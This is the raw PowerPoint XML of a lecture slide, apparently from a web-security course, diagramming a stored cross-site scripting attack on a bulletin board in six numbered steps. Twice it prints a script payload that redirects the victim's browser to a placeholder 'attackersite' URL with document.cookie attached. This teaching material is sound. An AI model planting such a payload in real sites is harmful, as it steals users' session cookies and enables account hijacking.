              <a:solidFill>
                <a:srgbClr val="E46C0A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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1160268" y="6358229"/>
              <a:ext cx="656794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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478057" y="6204942"/>
              <a:ext cx="3275093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600" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message Victim unaware of</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="703063" y="6260298"/>
              <a:ext cx="7655151" cy="242456"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq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kumimoji="0" lang="zh-TW" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4014144" y="1243413"/>
              <a:ext cx="1108348" cy="496701"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0000FF">
                    <a:shade val="30000"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="0000FF">
                    <a:shade val="67500"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0000FF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dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Victim</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7613340" y="1247515"/>
              <a:ext cx="1108348" cy="496701"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0000FF">
                    <a:shade val="30000"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="0000FF">
                    <a:shade val="67500"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0000FF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dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Website</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直線接點 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-1255422" y="3956362"/>
              <a:ext cx="4429156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="47625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none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="直線接點 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="2343774" y="3929066"/>
              <a:ext cx="4429156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="47625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none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="直線接點 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5942970" y="3942714"/>
              <a:ext cx="4429156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="47625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none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="群組 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4601926" y="2631040"/>
            <a:ext cx="3470536" cy="369332"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="428493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4610990" y="1643050"/>
              <a:ext cx="350520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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5037790" y="1643050"/>
              <a:ext cx="1840172" cy="428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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Logon request</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="群組 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596452" y="3271366"/>
            <a:ext cx="3476010" cy="371949"/>
            <a:chOff x="4604640" y="2143116"/>
            <a:chExt cx="3511550" cy="431529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5000628" y="2146152"/>
              <a:ext cx="2754720" cy="428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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 3. </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Set-Cookie: …</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="2143116"/>
              <a:ext cx="351155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prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="群組 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4604770" y="3988362"/>
            <a:ext cx="3470536" cy="369332"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="428493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4610990" y="1643050"/>
              <a:ext cx="350520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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5037790" y="1643050"/>
              <a:ext cx="2694557" cy="428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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Read the bulletin board</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="群組 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4599297" y="4760792"/>
            <a:ext cx="3582396" cy="1311414"/>
            <a:chOff x="4599296" y="4000505"/>
            <a:chExt cx="3582396" cy="1311414"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="群組 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4599296" y="4000505"/>
              <a:ext cx="3476010" cy="371949"/>
              <a:chOff x="4604640" y="2143116"/>
              <a:chExt cx="3511550" cy="431529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Text Box 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5000628" y="2146152"/>
                <a:ext cx="2968352" cy="42849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0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t> 5. </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="1F497D"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Show the malicious script</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4604640" y="2143116"/>
                <a:ext cx="3511550" cy="0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prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="triangle" w="med" len="med"/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4929190" y="4357812"/>
              <a:ext cx="3252502" cy="95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kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.location</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://attackersite/collect.cgi?cookie=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+ </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993190" y="5143512"/>
            <a:ext cx="3435934" cy="923330"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="1071230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071538" y="2425479"/>
              <a:ext cx="3433762" cy="1071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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>6. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The victim's browser runs the script and transmits the cookie to the attacker.</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1000100" y="2428868"/>
              <a:ext cx="3505200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="E46C0A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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="群組 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1000100" y="2102513"/>
            <a:ext cx="7072362" cy="1326489"/>
            <a:chOff x="1000100" y="2155654"/>
            <a:chExt cx="7072362" cy="1326489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="群組 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1000100" y="2155654"/>
              <a:ext cx="7072362" cy="406458"/>
              <a:chOff x="4610990" y="1643050"/>
              <a:chExt cx="3505200" cy="406458"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Line 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4610990" y="1643050"/>
                <a:ext cx="3505200" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="E46C0A"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Text Box 21"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4681802" y="1680176"/>
                <a:ext cx="2556825" cy="36933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0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="1F497D"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Post a malicious message onto the bulletin board.</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1214414" y="2528036"/>
              <a:ext cx="3286148" cy="95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kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.location</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://attackersite/collect.cgi?cookie=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+ </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="日期版面配置區 3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41" name="投影片編號版面配置區 4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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="頁尾版面配置區 4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Reflected XSS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6" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1958609" y="6206422"/>
            <a:ext cx="230197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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>message Victim aware of</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34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413268" y="1245653"/>
